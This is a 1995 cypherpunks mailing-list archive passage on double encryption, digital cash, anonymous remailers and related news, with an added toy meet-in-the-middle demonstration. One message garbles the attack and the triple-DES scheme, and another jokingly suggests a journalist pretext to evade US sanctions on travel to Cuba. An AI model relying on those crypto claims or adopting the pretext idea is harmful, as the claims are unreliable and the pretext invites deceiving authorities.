> > on St. Louis and Anguilla banking anything on getting Quebec residency, mail
> > services, and bank accounts?
> 
> Any plans if Quebec secedes?
Canada has a tax treaty with the States. Quebec wants US permission 
to stay within NAFTA (and the States have already stated this will not be 
automatic). Similarly the PQ also wants to stay within other Canadian 
international treaties. 

I really don't see a separate Quebec becoming even a semblance of a tax 
haven or being a hint less friendly to US interests than it is now.
We also have very high tax rates (and a bigger debt per cap) up here, 
Quebec's being the worst of all. I do remind you that Canada (French or 
English) is practically a political extension of the States. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 30 Oct 1995 13:36:15 +0800
To: Mark <mark@lochard.com.au>
Subject: Re: MD4-derived hash functions
In-Reply-To: <199510300353.AA55657@junkers.lochard.com.au>
Message-ID: <Pine.SOL.3.91.951029210721.22281A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Oct 1995, Mark wrote:

> 
> That doesn't make sense. If one accepts that double encryption is securer than
> single encryption, whether marginally or twice as secure, why not use it?
> 

Hi Mark -

The problem with double encryption with DES is that it's vulnerable to a 
meet-in-the-middle attack if you have known plain text. You can encrypt 
the plaintext with all possible keys and store them in a (big) table, then 
decrypt the cypher text until you get a match with one of the values in 
the table. 

Doesn't work too well on an 8Mb P90 (2^59 bytes is half a peta byte), but 
since memory capacity theoretically increases as the square of processor 
speed, the attack becomes feasible much, much, sooner than breaking a 112 
byte key.

Using 3-DES, even with only two distinct keys, makes this attack 
infeasible, as the table size becomes much too large. 2-IDEA is similarly 
safe (2^131 bytes of memory is a long way off (I wonder what the first 
version of M$ Word to need that much memory will be)).

Simon
 ---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 
	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 30 Oct 1995 13:58:59 +0800
To: cypherpunks@toad.com
Subject: Important Digital Cash Question...
In-Reply-To: <199510300447.PAA19230@sweeney.cs.monash.edu.au>
Message-ID: <Pine.SOL.3.91.951029212520.22281C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



Ok. So we've got Alice and Bob trading their cash back and forth, with 
Mallet trying to steal their cyber-dosh, and Eve listening to their 
conversations- this leads me to the big question:

What's the right name to use for the Banker? I've been using "Nick", 
after Nick Leeson; any other suggestions?

Simon 
---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: msprague@owens.ridgecrest.ca.us (M. F. (Pat) Sprague)
Date: Mon, 30 Oct 1995 13:55:46 +0800
To: cypherpunks@toad.com
Subject: Re: Digicash will not fly (not)
Message-ID: <199510300544.VAA12448@owens.ridgecrest.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


"James A. Donald" <jamesd@echeque.com> wrote:
>While Chaum is a brilliant cryptographer, he is an incompetent businessman
>
>He has demonstrated this in numerous ways.
>
>The latest being "Cash" where the bank skims off 4% to 10% every time.
>
>No one is going to use digicash under these kinds of terms and 
>conditions.


Doesn't just about everyone do precisely this when they pay sales tax?
Every time a buck arrives or departs a hand one pays a tax yet the system (you and I) continues accepting these terms albeit painfully.


> ---------------------------------------------------------------------
>              				|  
>We have the right to defend ourselves	|   http://www.jim.com/jamesd/
>and our property, because of the kind	|  
>of animals that we are. True law	|   James A. Donald
>derives from this right, not from the	|  
>arbitrary power of the state.		|   jamesd@echeque.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Childers James <ic58@jove.acs.unt.edu>
Date: Mon, 30 Oct 1995 12:15:16 +0800
To: Mark <mark@lochard.com.au>
Subject: Re: MD4-derived hash functions
In-Reply-To: <199510300353.AA55657@junkers.lochard.com.au>
Message-ID: <Pine.SOL.3.91.951029213809.15622A-100000@jove.acs.unt.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Oct 1995, Mark wrote:

> >The conclusion to take away from this is simple: double encryption
> >doesn't give you much extra security over single encryption.  Don't
> >use double encryption.
> 
> That doesn't make sense. If one accepts that double encryption is securer than
> single encryption, whether marginally or twice as secure, why not use it?

Ah yes, but the vagaries of crypto don't lend themselves to real-world 
analogies so easily. With crypto schemes, if you use double-encryption, 
you effectively halve the amount of time needed to crack them. This is 
because of the "man in the middle attack." Schneier talks about it in 
Applied Crypto, and I am sure others on this list know the technical 
details better than I.

What Schneier says has been proven to be secure is, instead, a triple 
encryption scheme. Using two different keys, it goes something like this 
(if memory serves):

	Ciphertext = P1xorEK1 -> C1xorDK1 -> C2xorEK1

Where P1 is the plaintext, EK1 is encrypt key 1, and DK1 is decrypt key 1.

That doesn't look right the longer I consider it, but the basic idea is 
there. Encrypt, decrypt, then encrypt again.


"Freedom is meaningless unless  | ic58@jove.acs.unt.edu - James Childers
 you can give to those with whom| No man's freedom is safe
 you disagree." - Jefferson     |    while Congress is in session
        EA 73 53 12 4E 08 27 6C   21 64 28 51 92 0E 7C F7
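
Added example, not part of the original messages: the table-based attack on double encryption that Simon Spero's message describes, next to the two-key encrypt-decrypt-encrypt construction mentioned above. The cipher is a toy 32-bit Feistel with 16-bit keys constructed for this example (it is not DES), and the keys and plaintexts are constructed sample values.

```python
from collections import defaultdict

KEY_BITS = 16               # toy key size so the demo finishes in seconds
KEYSPACE = 1 << KEY_BITS
MASK16 = 0xFFFF


def _f(half, key, rnd):
    """Toy round function, constructed for this example only."""
    x = (half ^ key ^ (0x9E37 * (rnd + 1))) & MASK16
    x = (x * 0x6A09 + 0x3C6F) & MASK16
    return ((x << 7) | (x >> 9)) & MASK16


def encrypt(block, key):
    """Four-round Feistel on a 32-bit block."""
    left, right = block >> 16, block & MASK16
    for rnd in range(4):
        left, right = right, left ^ _f(right, key, rnd)
    return (left << 16) | right


def decrypt(block, key):
    left, right = block >> 16, block & MASK16
    for rnd in reversed(range(4)):
        left, right = right ^ _f(left, key, rnd), left
    return (left << 16) | right


def double_encrypt(block, k1, k2):
    return encrypt(encrypt(block, k1), k2)


def ede_encrypt(block, k1, k2):
    """Two-key triple encryption: encrypt, decrypt, encrypt."""
    return encrypt(decrypt(encrypt(block, k1), k2), k1)


def ede_decrypt(block, k1, k2):
    return decrypt(encrypt(decrypt(block, k1), k2), k1)


def known_pairs(k1, k2):
    """Constructed known plaintext/ciphertext pairs under double encryption."""
    plaintexts = (0x43505558, 0x31393935, 0x00C0FFEE)
    return [(p, double_encrypt(p, k1, k2)) for p in plaintexts]


def meet_in_the_middle(pairs):
    """Recover (k1, k2) with about 2 * 2^k cipher operations, not 2^(2k)."""
    (p0, c0), rest = pairs[0], pairs[1:]
    work = 0
    # Forward half: every possible middle value E_k1(p0), indexed by value.
    table = defaultdict(list)
    for k1 in range(KEYSPACE):
        table[encrypt(p0, k1)].append(k1)
        work += 1
    # Backward half: D_k2(c0) must land on one of the stored middle values.
    hits = []
    for k2 in range(KEYSPACE):
        middle = decrypt(c0, k2)
        work += 1
        for k1 in table.get(middle, ()):
            # Extra known pairs weed out accidental matches.
            if all(double_encrypt(p, k1, k2) == c for p, c in rest):
                hits.append((k1, k2))
    return hits, work


if __name__ == "__main__":
    hits, work = meet_in_the_middle(known_pairs(0xBEEF, 0x1D3A))
    print("recovered:", [(hex(a), hex(b)) for a, b in hits])
    print("cipher operations:", work, "versus", KEYSPACE ** 2, "for brute force")
```

The cost is the table: one entry per first-stage key, which is the memory requirement the message refers to. With both EDE keys equal, `ede_encrypt` reduces to single encryption.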





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Tue, 31 Oct 1995 11:02:49 +0800
To: cypherpunks@toad.com
Subject: Pinkerton Risk Assessment & "Security 2000"
Message-ID: <9510300619.AA11035@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


I have been browsing through the MSN (Microsoft Network), and discovered a 
section in the "SOHO" (Small Home Owner's Guidebook) called "Partners Pages".  
In it there is a list of companies with icons which subscribers can click on to 
view these companies' business/financial-related services.

One of them is the Pinkerton Risk Assessment Service.  I opened & examined 
their several icons, and it suddenly occurred to me how useful this kind of 
on-line information could be to individuals in the new anarcho-capitalist, 
nationally-borderless world. 

Sort of in keeping with the theme which Sandy Sandfort and Duncan Frissell 
brought up with their "lectures" on "Risk" last year, as well as what I had 
said in an earlier post about people in our brave new world needing to become 
imaginative in providing for their own self-defense (seeing as how trusting the 
government doesn't work so well), it occurred to me that having information on 
threats to one's physical safety would be fitting for this need - like the RISK 
mailing list is for computers/software.  This kind of data would be different 
from what we can get on the regular news, which is combined with many other 
kinds of news and is very generalized, in that it deals more specifically with 
the subject.

They advertise their services as:

"... the risk assessment tool for the 21st century. If you or other members of 
your company travel internationally, the Global Risk Network  on MSN. is an 
invaluable service, keeping you informed of worldwide events, political 
turmoil, global sensitive spots, and more! Now you have direct online access to 
a wealth of exclusive Pinkerton information, all via your computer. You can 
even order hard copy reports or have customized research performed by Pinkerton 
Risk Assessment  experts, simply type in your request. Tailored for the 
individual traveler, as well as the corporate executive, our risk services give 
you several options to know the security situation anywhere."

Although their services are advertised for the corporate business traveler, it 
obviously is of use to any traveler, and particularly to the person who is in 
the location mentioned.  They have icons opening up to BBSes where they report 
on trouble spots and potential threats in a timely manner:

"The Global Risk Network provides even more detailed country data, including 
 The Daily Risk Assessment 
 Weekly Risk Assessment
 Special reports 
 Statistical analysis of significant incidents
   by country and region 
 Security tips 
 Eye on Travel "

You would think that if the NSA & other State Departments used their services, 
that they wouldn't need to poke around people's computers to better predict 
where to put added security for high honcho dignitaries or State office 
buildings.  But isn't that what the intelligence services are for?  Oh, well. 
Here, I thought, is a great service for the regular person which they can use 
to be prepared for the exigencies of life's little problems, like terrorists 
and other restive types with violence on their mind.

For any of you in the Washington, D.C. area, there will be a lecture from 
Pinkerton next week as detailed below.  If anyone from this list goes, it would 
be interesting to get a post on what they say - the section on cybersecurity 
might be of relevance to the list.

(I got this from the same location on their MSN site.):

IN COOPERATION WITH THE GEORGE WASHINGTON UNIVERSITY 
PRESENTS
SECURITY 2000 

Please join us at The George Washington University's Marvin Center on November 
9, 1995, for a seminar on topics of vital interest to security professionals. 
The seminar will highlight the opportunities and challenges of the security 
environment in China; computer crime and how it can affect your business; a 
global overview of political unrest, terrorism and crime,; and a demonstration 
of the new Pinkerton Global Risk Network on the Microsoft Network. Join us for 
the news, views and tools for ensuring your organization's security as we 
approach the 21st century.

Featuring: 
	0800-0900  China and Southeast Asia - Dan Grove, Pinkerton - Asia
	0910-1000  Cybercrime - Special Agent Jim Christy, 
		     Air Force Office of Special Investigations 
	1010-1110  Global Patterns and Trends - Hugh Barber, 
		     Pinkerton Risk Assessment Services
	1120-1220   Pinkerton Global Risk Network on the Microsoft Network
		      - Demonstrated by Frank Johns and Hugh Barber,
		        Pinkerton Risk Assessment Services
	1230-1400   Lunch - GWU Club (no charge)  

The GWU campus is just off the Foggy Bottom Metro stop, in Washington D.C., 
near the U.S. Department of State, where the annual OSAC conference will take 
place on November 7-8.  

There is no fee for the seminar, however, seating is limited. Please RSVP by 
calling Pinkerton Risk Assessment Services at (703) 525-6111, Fax (703) 
525-2454 or via e-mail at: pras@access.digex.net
--------------

  ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 30 Oct 1995 12:41:05 +0800
To: cypherpunks@toad.com
Subject: QUF_jpg
Message-ID: <199510300430.XAA01209@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   We have scanned "Quantum Computation's" seven formulae 
   and six figures as JPEG graphics files and will send for a 
plea:


   quf1.jpg -- Formulae 1-7; 32 kb.
   quf2.jpg -- Figures 1 and 2; 72 kb.
   quf3.jpg -- Figures 3 and 4; 95 kb.
   quf4.jpg -- Figures 5 and 6; 72 kb.


   Or, we will mash'em up .TIF, .PCX, .GIF, or tire-smeared
   pigeon.


   QUF_jpg  (4-part package, or items selected)


   [or *_tif, *_pcx, *_gif, *_tsp]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 30 Oct 1995 15:30:30 +0800
To: cypherpunks@toad.com
Subject: Re: Digicash will not fly (not)
Message-ID: <acb9bb9700021004f83d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:41 AM 10/30/95, M. F. (Pat wrote:
>"James A. Donald" <jamesd@echeque.com wrote:
>>While Chaum is a brilliant cryptographer, he is an incompetent businessman
>>
>>He has demonstrated this in numerous ways.
>>
>>The latest being "Cash" where the bank skims off 4% to 10% every time.
>>
>>No one is going to use digicash under these kinds of terms and
>>conditions.
>
>
>Doesn't just about everyone do precisely this when they pay sales tax?
>Every time a buck arrives or departs a hand one pays a tax yet the system
>(you and I)continues accepting these terms albeit painfully.

Many types of business dealings are exempt from sales tax, through
arrangements for resales.

I don't know if the "skims off 4% to 10% every time" point accurately
describes how the current Digicash model works, but certainly this will not
fly as a long term rate. So many monetary transactions happen in the course
of business that even a 4% fee _per transaction_ would rapidly wipe out
most of the value.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Mon, 30 Oct 1995 15:28:29 +0800
To: "M. F. (Pat) Sprague" <msprague@owens.ridgecrest.ca.us>
Subject: Re: Digicash will not fly (not)
In-Reply-To: <199510300544.VAA12448@owens.ridgecrest.ca.us>
Message-ID: <Pine.SUN.3.91.951030021540.906A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Oct 1995, M. F. (Pat) Sprague wrote:

> "James A. Donald" <jamesd@echeque.com wrote:
> >While Chaum is a brilliant cryptographer, he is an incompetent businessman
> >
> >He has demonstrated this in numerous ways.
> >
> >The latest being "Cash" where the bank skims off 4% to 10% every time.
> >
> >No one is going to use digicash under these kinds of terms and 
> >conditions.
> 
> 
> Doesn't just about everyone do precisely this when they pay sales tax?
> Every time a buck arrives or departs a hand one pays a tax yet the system (you and I)continues accepting these terms albeit painfully.



Unfortunately, now with digicash purchases you pay BOTH the sales tax AND 
the banks (extortionate) cut.


> 
> 
> > ---------------------------------------------------------------------
> >              				|  
> >We have the right to defend ourselves	|   http://www.jim.com/jamesd/
> >and our property, because of the kind	|  
> >of animals that we are. True law	|   James A. Donald
> >derives from this right, not from the	|  
> >arbitrary power of the state.		|   jamesd@echeque.com
> 
> 
> 
> 
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 30 Oct 1995 19:29:46 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Important Digital Cash Question...
Message-ID: <v02120d03acba633daa0e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



>What's the right name to use for the Banker? I've been using "Nick",
>after Nick Leeson; any other suggestions?

How about "Pip", J. Pierpont Morgan's childhood nickname. OK, OK, I'll sit
down now...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 30 Oct 1995 23:06:55 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199510301450.GAA23506@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek reord";
$remailer{"ecafe"} = "<remail@ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
ideath   remailer@ideath.goldenbear.com   -.-.-.---.-   7:12:57  99.97%
hacktic  remailer@utopia.hacktic.nl       ************     9:03  99.95%
rmadillo remailer@armadillo.com           ++++++++++++    42:02  99.93%
ecafe    remail@ecafe.org                 **####+*##*#     1:37  99.93%
wmono    wmono@valhalla.phoenix.net       ************    13:17  99.91%
penet    anon@anon.penet.fi               ---------+++  2:58:18  99.74%
robo     robo@c2.org                           ###--*#    25:08  99.71%
spook    remailer@valhalla.phoenix.net    ******** *+*    16:41  99.69%
replay   remailer@replay.com              *****+* * **     6:34  99.52%
mix      mixmaster@remail.obscura.com     ---- -- ---   1:44:59  99.46%
c2       remail@c2.org                    +    +++-- *    53:17  98.82%
syrinx   syrinx@c2.org                    -  _ ____ .+ 55:55:41  97.38%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***  #  #-+#    24:49  97.23%
flame    remailer@flame.alias.net           *     **+*    24:32  92.21%
vishnu   mixmaster@vishnu.alias.net         *     +***    10:39  90.65%
rahul    homer@rahul.net                  ***#*+ +#***     2:53  99.79%
alumni   hal@alumni.caltech.edu           +++#**-*+#       7:27  86.61%
portal   hfinney@shell.portal.com         **##*#-###       5:38  86.60%
ford     remailer@bi-node.zerberus.de     ____.--      38:06:00  86.33%
extropia remail@extropia.wimsey.com       -    . - -    5:24:35  63.83%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 31 Oct 1995 02:10:32 +0800
To: cypherpunks@toad.com
Subject: I-D ACTION:draft-eastlake-cybercash-v08-01.txt
Message-ID: <9510301638.AA17683@cantina.verity.com>
MIME-Version: 1.0
Content-Type: x-sun-attachment




A Revised Internet-Draft is available from the on-line Internet-Drafts 
directories.                                                               

       Title     : CyberCash Credit Card Protocol Version 0.8              
       Author(s) : D. Eastlake, B. Boesch, S. Crocker, M. Yesil
       Filename  : draft-eastlake-cybercash-v08-01.txt
       Pages     : 55
       Date      : 10/27/1995

CyberCash is developing a general payments system for use over the 
Internet.  The structure and communications protocols of version 0.8 are 
described.  This version includes credit card payments only.  Additional 
capabilities are planned for future versions.                   

This document covers only the current CyberCash system which is one of 
the few operational systems in the rapidly evolving area of Internet 
payments.  CyberCash is committed to the further development of its system 
and to cooperation with the Internet Engineering Task Force and other 
standards organizations.                                                             

Internet-Drafts are available by anonymous FTP.  Login with the username
"anonymous" and a password of your e-mail address.  After logging in,
type "cd internet-drafts" and then
     "get draft-eastlake-cybercash-v08-01.txt".
A URL for the Internet-Draft is:
ftp://ds.internic.net/internet-drafts/draft-eastlake-cybercash-v08-01.txt
 
Internet-Drafts directories are located at:	
	                                                
     o  Africa                                   
        Address:  ftp.is.co.za (196.4.160.8)	
	                                                
     o  Europe                                   
        Address:  nic.nordu.net (192.36.148.17)	
        Address:  ftp.nis.garr.it (192.12.192.10)
	                                                
     o  Pacific Rim                              
        Address:  munnari.oz.au (128.250.1.21)	
	                                                
     o  US East Coast                            
        Address:  ds.internic.net (198.49.45.10)	
	                                                
     o  US West Coast                            
        Address:  ftp.isi.edu (128.9.0.32)  	
	                                                
Internet-Drafts are also available by mail.	
	                                                
Send a message to:  mailserv@ds.internic.net. In the body type: 
     "FILE /internet-drafts/draft-eastlake-cybercash-v08-01.txt".
							
NOTE: The mail server at ds.internic.net can return the document in
      MIME-encoded form by using the "mpack" utility.  To use this
      feature, insert the command "ENCODING mime" before the "FILE"
      command.  To decode the response(s), you will need "munpack" or
      a MIME-compliant mail reader.  Different MIME-compliant mail readers
      exhibit different behavior, especially when dealing with
      "multipart" MIME messages (i.e., documents which have been split
      up into multiple messages), so check your local documentation on
      how to manipulate these messages.
							
For questions, please mail to Internet-Drafts@cnri.reston.va.us.
							

Below is the data which will enable a MIME compliant mail reader 
implementation to automatically retrieve the ASCII version
of the Internet-Draft.

----- End Included Message -----


Content-Type: Multipart/Alternative; Boundary="OtherAccess"

--OtherAccess
Content-Type:  Message/External-body;
        access-type="mail-server";
        server="mailserv@ds.internic.net"

Content-Type: text/plain
Content-ID: <19951027135555.I-D@CNRI.Reston.VA.US>

ENCODING mime
FILE /internet-drafts/draft-eastlake-cybercash-v08-01.txt

--OtherAccess
Content-Type:   Message/External-body;
        name="draft-eastlake-cybercash-v08-01.txt";
        site="ds.internic.net";
        access-type="anon-ftp";
        directory="internet-drafts"

Content-Type: text/plain
Content-ID: <19951027135555.I-D@CNRI.Reston.VA.US>

--OtherAccess--
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 30 Oct 1995 06:53:53 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: EE Times on IDEA
In-Reply-To: <199510281250.NAA14958@utopia.hacktic.nl>
Message-ID: <Pine.SOL.3.91.951030075604.12602E-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 28 Oct 1995, Anonymous wrote:
> Electronic Engineering Times
> Oct 23, 1995 p. 66
> 
> T.R MADHUSUDAN SASTRY,
> T. GANESAN, B.MADHUKAR
> AND N. SRINIVASA

> involved. The current implementation of Idea in ECB on Motorola's DSP
> 56166 running at 60 Mhz supports up to 625 kbits/second in full-duplex
> mode. That is 3.6 times faster than using the DES algorithm.

That last statement is rubbish.  For most CPUs I've seen, IDEA is either 
the same speed as DES or a bit slower.  There is no way that it is 3 
times faster than single DES.

                   DES cbc    IDEA cbc
DSP 56166            ???        78 k/s   (625 kbits/sec)
486DX/50            274 k/s    177 k/s   Solaris 2.4
Pentium 90          703 k/s    605 k/s   Linux
'old' R6000 box     295 k/s    283 k/s
'old' Alpha box    1300 k/s    690 k/s   (no 64 bit optimisations)
88100               558 k/s    526 k/s
PA-RISC            1072 k/s    616 k/s   (very compiler dependent)
R4400 200mhz       1600 k/s   1290 k/s
Sparc 10            695 k/s    679 k/s

All speeds are in bytes/second.  The DES implementation is a 'standard'
fast DES (there are at least 2 DES packages on the net with this type of
speed) and the IDEA implementation is a 'standard' IDEA implementation
(similar speed to the reference versions).  Both written in C.  I have
looked at how I could optimise IDEA but it does not lend itself to vast
improvements the way DES does.  It may be possible to speed up IDEA by
20% with good C compilers but that will still only be the speed of DES, I
do not think IDEA should be 'sold' as being faster than DES in software. 
It is not.  It has over twice the key length (128 vs 56) and that is its
main benefit.

eric (having a rant at mis-information).
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Tue, 31 Oct 1995 02:08:18 +0800
To: cypherpunks@toad.com
Subject: Re: Pinkerton Risk Assessment & "Security 2000"
Message-ID: <199510301653.IAA24958@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


For even more, free information of this type, see the Counter-Terrorism page:

http://www.interlog.com/~vabiro/

An interesting collection of links and data...

Joel





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 31 Oct 1995 02:00:12 +0800
To: cypherpunks@toad.com
Subject: Re: Cuban Security Conference
Message-ID: <199510301723.JAA22047@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>		International Conference Center
>		     Pabexpo, Havana, Cuba
>			March 4-9, 1996
>	3rd Ibero-American Seminar on Protection against
>    Computer Viruses and Security of Information Technologies

I wonder if they'd be receptive to talks on private communications,
digicash, tax avoidance through digital technology, anarchy and
collapse of government power, etc. :-)   (Maybe they would;
Cuba's got to do something to get their economy out of the
post-Soviet-subsidy doldrums, and with the US preventing free
trade in sugar for them, maybe allowing capitalism will be their
only choice...)

For any Yankees interested in going, you generally need to be
a journalist of some sort to avoid the Trading With The Enemy Act
restrictions, but in cyberspace, that's easily arranged.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 31 Oct 1995 02:46:42 +0800
To: cypherpunks@toad.com
Subject: Keyed-MD5, ITAR, and HTTP-NG
Message-ID: <Pine.SOL.3.91.951030101221.319D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



To summarise: the consensus is that using keyed-MD5 for authentication is 
